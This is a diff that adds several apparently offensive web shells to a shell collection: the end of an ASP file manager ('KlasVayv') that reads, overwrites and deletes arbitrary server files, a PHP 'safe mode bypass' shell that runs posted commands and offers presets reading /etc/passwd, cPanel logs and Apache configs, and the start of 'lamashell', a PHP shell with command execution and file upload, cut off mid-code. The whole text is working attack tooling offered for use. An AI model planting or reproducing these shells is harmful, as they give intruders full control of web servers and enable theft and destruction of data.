+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+
+
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan Alan</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=aktifklas%></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="174">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#C5C5C5" height="134">
+    <form method="POST" action="klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>" name="klaspos">
+<p align="center"><font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="37" maxlength="32"
+                name="duzenx" value="Klasör Adı"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanıcı'"
+                onfocus="if (this.value == 'Kullanıcı') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center">&nbsp;&nbsp;
+<br>
+<br>
+<br>
+                </font>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Oluştur"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+
+
+<%
+else
+%>
+
+
+
+<%
+if request.querystring("suruculer") <> "" then
+%>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    KlasVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="4">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="4">
+        <span style="font-size: 2pt">&nbsp;</span></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="153">
+  <tr>
+    <td width="100%" height="19" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" height="113" bgcolor="#E1E1E1">&nbsp;<div align="center">
+      <center>
+      <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber2" height="17">
+        <tr>
+          <td width="208" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Sürücü Adı</font></td>
+          <td width="75" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Boyutu</font></td>
+          <td width="75" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Boş Alan</font></td>
+          <td width="64" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">Durum</font></td>
+          <td width="62" height="17" align="center" bgcolor="#C5C5C5">
+          <font face="Verdana" style="font-size: 8pt">İşlem</font></td>
+        </tr>
+      </table>
+      </center>
+    </div>
+    <div align="center">
+      <center>
+
+
+	<%
+	set klassis =server.createobject("scripting.filesystemobject")
+	set klasdri=klassis.drives
+	%>
+	
+	<%
+	for each dongu in klasdri
+	%>
+			
+	<%
+	if dongu.driveletter <> "A" then
+	if dongu.isready=true then
+	%>
+
+	<%
+	select case dongu.drivetype
+	case 0 teype="Diğer"
+	case 1 teype="Taşınır"
+	case 2 teype="HDD"
+	case 3 teype="NetWork"
+	case 4 teype="CD-Rom"
+	case 5 teype="FlashMem"
+	end select
+	%>
+      <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber3" height="17">
+        <tr>
+          <td width="208" height="17" align="left" bgcolor="#EEEEEE">
+          <font face="Verdana" style="font-size: 8pt">&nbsp;<%=dongu.driveletter%>:\ ( <%=dongu.filesystem%> )</font></td>
+          <td width="75" height="17" align="center" bgcolor="#E0E0E0">
+          <font face="Verdana" style="font-size: 8pt"><%=Round(dongu.totalsize/(1024*1024),1)%> MB</font></td>
+          <td width="75" height="17" align="center" bgcolor="#E0E0E0">
+          <font face="Verdana" style="font-size: 8pt"><%=Round(dongu.availablespace/(1024*1024),1)%> MB</font></td>
+          <td width="64" height="17" align="center" bgcolor="#E0E0E0">
+          <font face="Verdana" style="font-size: 8pt"><%=teype%>&nbsp;</font></td>
+          <td width="62" height="17" align="center" bgcolor="#E0E0E0">
+          <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber24">
+            <tr>
+          <td width="62" height="17" align="center" bgcolor="#E0E0E0"
+          onmouseover="this.style.background='#A0A0A0'"
+          onmouseout="this.style.background='#E0E0E0'"
+          style="CURSOR: hand"
+          
+          >
+          <a href="klasvayv.asp?klas=<%=dongu.driveletter%>:\" style="text-decoration: none">
+          <font face="Verdana" style="font-size: 8pt" color="#000000">Gir</font></a></td>
+            </tr>
+          </table>
+          </td>
+        </tr>
+      </table>
+
+	<%
+	end if
+	end if
+	%>
+<%
+next
+%>
+
+
+
+      </center>
+    </div>
+    <div align="center">
+      <center>
+      <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber4" height="4">
+        <tr>
+          <td width="484" height="4" align="center" bgcolor="#C5C5C5">
+          <span style="font-size: 2pt">&nbsp;</span></td>
+        </tr>
+      </table>
+      </center>
+    </div>
+    <p>&nbsp;</p>
+    </td>
+  </tr>
+  <tr>
+    <td width="100%" height="19" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+
+
+
+
+<%
+else
+%>
+
+
+
+
+
+<%
+if request.querystring("kaydet") <> "" then
+set dossisx=server.createobject("scripting.filesystemobject")
+set dosx=dossisx.opentextfile(request.querystring("kaydet"), 2, true)
+dosx.write request("duzenx")
+dosx.close
+set dosyax=nothing
+set dossisx=nothing
+
+end if
+%>
+
+
+
+
+<%
+if request.querystring("duzenle") <> "" then
+set dossis=server.createobject("scripting.filesystemobject")
+set dos=dossis.opentextfile(request.querystring("duzenle"), 1)
+sedx = dos.readall
+dos.close
+set dosya=nothing
+set dossis=nothing
+
+set aktifklas=request.querystring("klas")
+%>
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    KlasVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan Dosya</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=response.write(request.querystring("duzenle"))%></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    <form method="POST" action="klasvayv.asp?kaydet=<%=request.querystring("duzenle")%>&klas=<%=aktifklas%>" name="kaypos">
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="163" wrap="OFF"><%=sedx%></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></b></p>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber19">
+  <tr>
+    <td width="100%" align="right">
+    <p align="center">
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span><a href="klasvayv.asp"><input type="reset" size="16"
+		name="x" value="Vazgeç"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></a></td>
+  </tr>
+</table>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#EAEAEA">
+    <p align="right">
+	&nbsp;</td>
+  </tr>
+</table>
+
+
+
+<%
+else
+%>
+
+
+<%
+
+if request.querystring("klas") <> "" then
+aktifklas=Request.querystring("klas")
+if request.querystring("usak") = "1" then
+aktifklas=aktifklas & "\"
+end if
+
+else
+aktifklas=server.mappath("/")
+aktifklas=aktifklas & "\"
+end if
+
+if request.querystring("silklas") <> "" then
+set sis=createobject("scripting.filesystemobject")
+silincekklas=request.querystring("silklas")
+sis.deletefolder(silincekklas)
+set sis=nothing
+'response.write(sil & "  Silindi")
+end if
+
+if request.querystring("sildos") <> "" then
+silincekdos=request.querystring("sildos")
+set dosx=createobject("scripting.filesystemobject")
+set dos=dosx.getfile(silincekdos)
+dos.delete
+set dos=nothing
+set dosyasis=nothing
+end if
+
+
+
+
+select case aktifklas
+case "C:" aktifklas="C:\"
+case "D:" aktifklas="D:\"
+case "E:" aktifklas="E:\"
+case "F:" aktifklas="F:\"
+case "G:" aktifklas="G:\"
+case "H:" aktifklas="H:\"
+case "I:" aktifklas="I:\"
+case "J:" aktifklas="J:\"
+case "K:" aktifklas="K:\"
+end select
+
+
+
+if aktifklas=("C:") then aktifklas=("C:\")
+
+Set FS = CreateObject("Scripting.FileSystemObject")
+Set klasor = FS.GetFolder(aktifklas)
+Set altklasorler = klasor.SubFolders
+Set dosyalar = klasor.files
+%>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    KlasVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan Klasör</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=response.write(aktifklas)%></font></td>
+            <td width="65">
+            <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
+              <tr>
+                <td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13">
+                <p align="center"><font face="Verdana" style="font-size: 8pt">
+
+                <a href="klasvayv.asp?usklas=1&klas=<%=server.urlencode(left(aktifklas,(instrRev(aktifklas,"\"))-1))%>" style="text-decoration: none">
+                <font color="#000000">Üst Klasör</font></a></font></td>
+                
+              </tr>
+            </table>
+            </td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
+  <tr>
+    <td width="625" bgcolor="#000000"><span style="font-size: 2pt">&nbsp;</span></td>
+  </tr>
+  <tr>
+    <td bgcolor="#000000" height="20">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
+      <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        
+        height="19" bordercolor="#000000">
+        <span style="font-weight: 700">
+        <font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+        <a href="klasvayv.asp?suruculer=1" style="text-decoration: none">
+        <font color="#9F9F9F">Sürücüler</font></a></font></span></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="klasvayv.asp?klasac=1&aktifklas=<%=aktifklas%>" style="text-decoration: none">
+        <font color="#9F9F9F">Yeni Klasör</font></a></font></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19"
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+		bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="klasvayv.asp?yenidosya=<%=aktifklas%>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+  </table>
+
+
+			
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Tür</font></td>
+    <td height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Dosya 
+    Adı</font></td>
+    <td width="122" height="17" bgcolor="#9F9F9F">
+    <p align="center">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;İşlem</font></td>
+  </tr>
+</table>
+
+
+
+<% For each oge in altklasorler %> 
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#808080">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif"></td>
+    <td height="17" bgcolor="#C4C4C4">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<%=oge.name%>&nbsp;</font></td>
+    <td width="61" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="klasvayv.asp?klas=<%=aktifklas%><%=oge.name%>\" style="text-decoration: none">
+        <font color="#000000">Aç</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+
+
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="klasvayv.asp?silklas=<%=aktifklas & oge.name & "&klas=" & aktifklas %>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a>
+
+        </font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<% Next %>
+			    
+
+<% For each oge in dosyalar %> 
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
+  <tr>
+    <td width="30" height="1" bgcolor="#B0B0B0">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/1.gif"></td>
+    <td height="1" bgcolor="#EAEAEA">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<%=oge.name%> </font>
+    <font face="Arial Narrow" style="font-size: 8pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;   ( <%=Round(oge.size/1024,1)%> KB )&nbsp;</font></td>
+    <td width="61" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a style="text-decoration: none" target="_self" href="klasvayv.asp?duzenle=<%=aktifklas%><%=oge.name%>&klas=<%=aktifklas%>">
+        <font color="#000000">Düzenle</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="klasvayv.asp?sildos=<%=aktifklas%><%=oge.name%>&klas=<%=aktifklas%>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<% Next %>
+
+
+
+<%
+if aktifklas=("C:\") then aktifklas=("C:")
+%>
+
+
+<%
+end if
+%>
+
+
+
+<%
+end if
+%>
+
+
+<%
+end if
+%>
+
+
+<%
+end if
+%>
+
+<%
+end if
+%>
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+</body>
+
+</html>
\ No newline at end of file
diff --git a/138shell/L/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt b/138shell/L/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt
new file mode 100644
index 0000000..06a3035
--- /dev/null
+++ b/138shell/L/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt	
@@ -0,0 +1,34 @@
+<?
+echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit</font></b><br>";
+print_r('
+<pre>
+<form method="POST" action="">
+<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="Çalıştır" type="submit">
+</form>
+<form method="POST" action="">
+<b><font color=blue>Hızlı Menü :=) :</font><select size="1" name="liz0">
+<option value="cat /etc/passwd">/etc/passwd</option>
+<option value="netstat -an | grep -i listen">Tüm Açık Portaları Gör</option>
+<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
+<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
+<option value="cat /etc/hosts">/etc/hosts</option>
+<option value="cat /etc/named.conf">/etc/named.conf</option>
+<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
+</select> <input type="submit" value="Göster Bakim">
+</form>
+</pre>
+');
+ini_restore("safe_mode");
+ini_restore("open_basedir");
+$liz0=shell_exec($_POST[baba]); 
+$liz0zim=shell_exec($_POST[liz0]); 
+$uid=shell_exec('id');
+$server=shell_exec('uname -a');
+echo "<pre><h4>";
+echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>";
+echo "<b><font color=red>Server</font></b>:$server<br>";
+echo "<b><font color=red>Komut Sonuçları:</font></b><br>"; 
+echo $liz0;
+echo $liz0zim;
+echo "</h4></pre>";
+?>
\ No newline at end of file
diff --git a/138shell/L/lamashell.txt b/138shell/L/lamashell.txt
new file mode 100644
index 0000000..1df8222
--- /dev/null
+++ b/138shell/L/lamashell.txt
@@ -0,0 +1,89 @@
+<?
+if($_POST['dir'] == "") {
+
+ $curdir = `pwd`;
+} else {
+ $curdir = $_POST['dir'];
+}
+
+if($_POST['king'] == "") {
+
+ $curcmd = "ls -lah";
+} else {
+ $curcmd = $_POST['king'];
+}
+
+
+?>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
+                        "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+  <head>
+    <title>lama's'hell v. 3.0</title>
+    <style type="text/css">
+     body {
+      color: white; background-color: black;
+      font-size: 12px;
+      font-family: Helvetica,Arial,Sans-Serif;
+     }
+    </style>
+  </head>
+  <body>
+    <pre>
+                              _           _
+                             / \_______ /|_\
+                            /          /_/ \__
+                           /             \_/ /
+                         _|_              |/|_
+                         _|_  O    _    O  _|_
+                         _|_      (_)      _|_
+                          \                 /
+                           _\_____________/_
+                          /  \/  (___)  \/  \
+                          \__(  o     o  )__/ <?
+$ob = @ini_get("open_basedir");
+$df = @ini_get("disable_functions");
+if( ini_get('safe_mode') ) {
+   echo "SM: 1 \\ ";
+} else {
+   echo "SM: 0 \\ ";
+}
+if(''==$df) {
+   echo "DF: 0 \\ ";
+} else {
+   echo "DF: ".$df." \\ ";
+}
+echo "".php_uname()."\n";
+?>
+<hr></pre>
+    <table><form method="post" enctype="multipart/form-data">
+      <tr><td><b>Execute command:</b></td><td><input name="king" type="text" size="100" value="<? echo $curcmd; ?>"></td>
+      <tr><td><b>Change directory:</b></td><td><input name="dir" type="text" size="100" value="<? echo $curdir; ?>"></td>
+      <td><input name="exe" type="submit" value="Execute"></td></tr>
+
+      <tr><td><b>Upload file:</b></td><td><input name="fila" type="file" size="90"></td>
+      <td><input name="upl" type="submit" value="Upload"></td></tr>
+    </form></table>
+<pre><hr>
+<?
+    if(($_POST['upl']) == "Upload" ) {
+    if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir."/".$_FILES['fila']['name'])) {
+        echo "The file has been uploaded<br><br>";
+    } else {
